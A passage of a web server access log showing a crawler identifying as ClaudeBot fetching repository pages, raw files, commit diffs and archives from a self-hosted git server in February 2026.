216.73.216.188] [Length 10920] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 11104] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.tar.gz" [Client 216.73.216.188] [Length 25538608] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10917] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 11093] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.zip" [Client 216.73.216.188] [Length 25670278] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=docker-compose.yml" [Client 216.73.216.188] [Length 19568] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2Fglobal.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 216.73.216.188] [Length 10953] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10918] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html" [Client 216.73.216.188] [Length 26070] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 11515] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=all" [Client 216.73.216.188] [Length 8471] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md?display=rendered" [Client 216.73.216.188] [Length 13658] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=docker-compose.yml" [Client 216.73.216.188] [Length 18713] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.zip" [Client 216.73.216.188] [Length 25542058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=rendered" [Client 216.73.216.188] [Length 10958] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 14535] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 216.73.216.188] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstart.sh" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 9827] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 15161] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9859] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 14260] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=source" [Client 216.73.216.188] [Length 11394] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.tar.gz" [Client 216.73.216.188] [Length 310407] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9850] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10838] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2F.TemporaryDocument%2Fclaude.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11709] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html" [Client 216.73.216.188] [Length 19792] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10851] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9857] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 234334] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 5559] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 1658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 10039] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 29] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 216.73.216.188] [Length 13799] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=rendered" [Client 216.73.216.188] [Length 12324] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 